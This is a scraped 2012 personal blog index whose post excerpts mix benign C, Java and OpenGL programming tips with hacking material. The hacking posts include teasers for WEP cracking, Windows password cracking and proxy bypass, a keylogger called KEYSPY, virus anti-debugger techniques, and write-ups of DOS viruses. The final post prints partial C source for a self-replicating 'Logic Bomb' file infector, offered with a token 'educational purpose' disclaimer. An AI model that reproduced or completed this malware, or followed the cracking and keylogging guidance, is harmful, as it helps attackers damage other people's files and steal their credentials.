Tuesday, August 28, 2012

Graphics in GNU - C (gcc)

Here is an article which teaches you to install graphics packages in ubuntu or in any other linux operating system. Most of the coders would try their graphic codes in windows because MS DOS comes with a default graphics package called graphics.h. However the results of execution of graphics programs in linux operating system is far more better than in windows. and I've tried that in my ubuntu laptop. So the upcoming part of this article will contain the steps required to install graphics packages in ubuntu or in any other linux operating system.

Wednesday, August 22, 2012

Cracking WiFi in 11 Steps

Wifiway is a Live CD based on Unix Kernel, Mostly used to crack open WiFi networks. This tutorial corresponds the same. Codeknock is going to present a tutorial to Crack the WEP keys.
Mostely WiFi networks are secured with WEP encryption. i.e, The packets sent and received over the WiFi network are encrypted with this WEP Key. You cant connect to that WiFi network without knowing that key. It may be a 5 Digit ASCII or 13 Digit HEX and more based on the encryption seeding it follows. Let's Crack it!

Crack Windows Password with OHPCrack

OHP Crack is a Unix-Flavored Live CD.
Live CD means, It can boot directly from your BIOS without making disturbances to your HDD. When I said as Live-CD many of you might think that it is a Compact-Disk. Actually It's not. It's a CD Image. You can burn that Image to your Pendrive or to a Empty CD and you can boot ti up! Come on! I'll Explain...!

Sunday, August 19, 2012

How to access a banned or blocked website in your college or school computer ?

how to access a banned or blocked website in your college or school computer ?
how to bypass your college proxy ?
how to make your browsing anonymous?
how to change your ip address ?

i see so many questions infront of me but the answer is the same n simple

Thursday, August 16, 2012


Virus Name:  GOLD-BUG
V Status:    New, Research
Discovery:   January, 1994
Symptoms:    CMOS checksum failure; Creates files with no extension. Modem answers on 7th ring; BSC but it is hidden; Most virus scanners fail to run or are Deleted; CHKLIST.??? files deleted.
Origin:      USA
Eff Length:  1,024 Bytes
Type Code:   SBERaRbReX - Spawning Color Video Resident and Extended HMA Memory Resident Boot-Sector and Master-Sector Infector
Detection Method:  None
Removal Instructions:  See Below

Wednesday, August 15, 2012

FIREFLY - More than A Smart Virus

Firefly is an encrypted, memory resident virus which infects
.COM files on load.  It incorporates code from Proto-T
LokJaw and YB-X viruses and, when in memory, attacks a large election of anti-virus programs as they are executed.  Anti-virus programs identified by Firefly's execute/load handler are deleted.
Firefly incorporates simple code from previous issues of the newsletter signed to de-install generic VSAFE resident virus activity
filters designed for Microsoft by Central Point Software.

Tuesday, August 14, 2012

Anti-Debugger Techniques


        Ok, now the AV can not even get your virus to infect their bait
files, and if they do finally manage,  they will have great problems in
getting a complete,  accurate view of what they are dealing with.

--By Sibidharan

KEYSPY : Password Capturing Made Easy

A little something I cooked up when I was bored one afternoon ...

KEYSPY is a program which is intended to capture keystrokes when a password-protected or login program is run and save them in a hidden file in the root directory. This will enable the resourceful user to find plenty of login names and passwords.

By Sibidharan v 0.90

Monday, August 13, 2012


The information in this article concerns the backdoors in MS-DOS and BIOS that can be used and abused by a virus for it's own ends!  Most of them concern the Int21h DOS services interrupt and Int13h Disk services.

Sunday, August 12, 2012

Virus found in Middle East that can spy on finance transactions: Kaspersky

A new cyber surveillance virus has been found in the Middle East that can spy on financial transactions, email and social networking activity, according to a leading computer security firm, Kaspersky Lab.

Dubbed Gauss, the virus may also be capable of attacking critical infrastructure and was built in the same laboratories as Stuxnet, the computer worm widely believed to have been used by the United States and Israel to attack Iran's nuclear program, Kaspersky Lab said on Thursday.

Saturday, August 11, 2012

Key facts about virus that can steal banking credentials

A new computer virus, dubbed Gauss, has been discovered in the Middle East. Researchers say can it steal banking credentials and hijack login information for social networking sites, email and instant messaging accounts. 

Cyber security firm Kaspersky Lab said Gauss is the work of the same "factory" or "factories" that built the Stuxnet worm, which attacked Iran's nuclear program. Here are some key facts about Gauss, according to Kaspersky Lab.

Hack A Remembered password in a browser & Find Out the Password behind The Stars !!

I am going to show you a simple trick with which you can find all the passwords that are remembered on a browser .This post will teach you how to find out the password behind the stars ! *******
This post may be Silly for a computer genius or a network hacker .Anyway I recommend them to stop reading this post !

It feels ridiculous and may arise a question in your mind for sure ... "Is this Possible ?"

Yes ! It is . And the best part is that it takes less than 20 seconds to unwrap the mask! 

Doing It With GI :

Almost all the browsers have this feature ...

Chrome Chrome:

Wrench menu > Settings

Thursday, August 9, 2012

Inbuilt Screenshot Taker in Windows (Problem Step Recorder)

All of us now that we can easily take up screenshots using the print screen button .Most of the linux users are familiar with that ...

And now , if you mess up working with any program in windows and you want a help from your friend .

What will you do ??

This problem makes me to think of the phrase " Windows 7 , your PC simplified"

Yes , the answer is very simple . windows 7 has a inbuilt screenshot taker that records your  actions and keystrokes


Wednesday, August 8, 2012

How To Post a Profile Picture in Facebook Chat

Wouldn't be cool if could type up a person's profile picture in a fb chat ?!

yep ! .. its possible ....

Step 1 :
Find out the user id or user name of the person whose profile picture has to be typed

Monday, August 6, 2012

Invisible Browsing

Content Updated to new article here

Old Contents:

Hey College students..!

Your hostel wifi sucking ??

Unable to browse some sites ??

Here is a Tool! For Windows Users!

Download it! and Enjoy Invisible Browsing..!

Another article based on this is here!!

Sunday, August 5, 2012

Facebook Phishing Protection

This week, you may have heard about some new phishing websites that were created to look identical to authentic Facebook pages. Phishing is common across the Internet, but the security team at Facebook has been working to halt the spread of these latest malicious sites.

The fake sites, like the one below, use a similar URL to Facebook.com in an attempt to steal people's login information. The people behind these websites, known as "phishers," then use the information to access victims' accounts and send messages to their friends, further propagating the illegitimate sites. In some instances, the phishers make money by exploiting the personal information they've obtained.

Saturday, August 4, 2012

How to Install Source Files in Ubuntu

For all those who are beginners in any linux(ubuntu) find hard to find the package files of their distro and end up in finding an source package(which is either in tar.gz or .gz).. so now people think how to install these source files.....

Thursday, August 2, 2012

How to read the content from the RAM (Random Access Memory)

How to read the content from the RAM (Random Access Memory)

RAM Stands for "Random Access Memory,". RAM is made up of small memory chips that form a memory module. These modules are installed in the RAM slots on the motherboard of your computer.

Monday, July 16, 2012

Amazing DOT Tricks

Most of us would be using Gmail for email service . Do you have a period “.” in your email address .? If yes , then try logging into your account without that period and if no , then try to add a period wherever you want and then login. You will be granted access to your account.

Not understood ? Let me give you an example .

Thursday, July 12, 2012

Emulated Turbo C++ - Full Screen Version-Windows-Vista-7-8-x86-x64

Emulated Turbo C++ v3.00 for All Aero Based Windows version! Just Install the package and start using C++ full screen on your Windows!! No more need to stuck with XP for your programming needs!! Go Ahead and Do Code!!

Wednesday, July 11, 2012

printf() Tricks - C - Win/GNU

It may be old-fashioned, but I still find printf (and sprintf and _vsnprintf) incredibly useful, both for printing debug output and for generating formatted strings.

Here are a few lesser-known formats that I use again and again.

Monday, July 9, 2012

Evil C

This is a collection of strange C (and some Java) constructs. It's probably best not to use them, but you should know why they work

The cast-to-bool operator

Node *left, *right;
int childCount() 


Calling C Code from Java

**Using native code with Java applications and the Sun JDK


This article shows how to access C code (also called native code) from within Java code. The C code exists as a PowerPC shared library containing several Process Manager calls. The functions in the shared library are used to get and store process information. A Java front-end calls the shared library at specified intervals to retrieve and display the process information. Timing for these calls is accomplished using a thread. The front-end also includes a preferences dialog with a pseudo-custom control written in Java. This program runs as a Java application, not an applet.

Sunday, July 8, 2012

General Keyboard Shortcuts

General Keyboard Shortcuts

  1. CTRL+C (Copy)
  2. CTRL+X (Cut)
  3. CTRL+V (Paste)
  4. CTRL+Z (Undo)
  5. DELETE (Delete)

Saturday, July 7, 2012

Constructing variable length structs in C

A trick to using structs that have a variable sized member is to use an overloaded operator new to allocate space for the struct.

struct string

Thursday, July 5, 2012

Y2K Problem + Day_of_week game! C-GNU/Linux

Hi geeks.. There we can find some of our friends who can find the Day-of-Week just with the date in few counts..! That's interesting game you know ? We can do that game as a program.. Yes we can..

Working with big endian data

A have always favored little endian number representation over big-endian, which why I was saddened whn I found that TCP/IP, and most internet protocols (such as SSL3) use a big endian representation for numbers. Following is the type of construct I use when I need to work with a non-native data type in structs that I pull off of the network.

Playing with the C stack

Parameters on the stack appear in memory with the leftmost item at the lowest memory location. Thus you can get a pointer to your functions stack frame, and walk the parameter list, or even cast your stackframe to a struct that can be passed to other functions.

Wednesday, July 4, 2012

Scan Characters without echoing - C

Happy to see you again..!

Have you noticed in UNIX terminal.. ? The characters of password you are typing will be hidden, that is not even replaced with a dot or asterisk(*) else nothing will be displayed. So it's impossible to find the number of characters in the password. What we are

Tuesday, July 3, 2012

Random Numbers - DIE Example - C++ / GNU

A program that illustrates the Random Number Generation, with Rolling Dice.
It will run only on Unix environment.

Movement of Teapot - OpenGL

An openGL program to illustrate the movement of teapot:

#include <cstdlib>
#include <iostream> // C++ I/O
#include <cstdio> // C I/O (for sprintf)
#include <cmath> // standard definitions
#include <GL/glut.h> // GLUT
#include <GL/glu.h> // GLU
#include <GL/gl.h> // OpenGL

Destructor - Java

Java uses finalize() method for Garbage collection. 


import java.io.*;
public class FinalizeObject extends FileOutputStream

Can you read a space with scanf? - C GNU/Win

If you are a student, and you are learning C, your teacher would have thought you that scanf can't read spaces as it treats spaces as line breakers. But It's not actually like that. See,

void main(void)
  char line[32];
  printf("Enter a Text with Space :");
  printf("\n\nReceived Text : %s",line);

New Color Print for C/C++ DOS/Unix

No need of cprintf(...), no need of textmode(), textcolor(), textbackground().. Just print it as a string usin formatted character (%s). I'll give you examples.

Example Code :

Getting A Line Without Echoing - java.io.Console

Here's a code that can show how to receive a String or a Char[] without echoing

ConIO Extended features for GNU-C

Some of Extended ConIO features for GNU-C. Download it from here..!


Monday, July 2, 2012

Sunday, July 1, 2012

Logic Bomb. Actually a virus!

No Way I'm Responsible for Execution of this Bomb. This sort of viruses are called as LogicalBombs. They just replicate themselves into other files and inject itself byte by byte to other files in programmed directory. Windows based C Source Code. 

Should be used for educational purpose only.
void ext_rename(char file[])
 char old[1000],ext[]="exe";
 int i,status;
void main(int argc,char* argv[])
 char buf[512];
 char old[1000],ext[]="exe";
 int i,status;
 int source,target,byt,done;
 struct ffblk ffblk;
 printf("\nVirus: Logic Bomb 1.0\nProgrammer: SIBIDHARAN N\n");
 cprintf("\nPress any key to start Injecting..");
 done = findfirst("*.*",&ffblk,0);
  cprintf(" %s ", ffblk.ff_name);
  printf("is converted into a");
  cprintf(" Logicbomb");
  done = findnext(&ffblk);


Not Actually A Virus

This is not actually a virus, but there it's being detected as a virus. Reasons are quoted below..!

union abc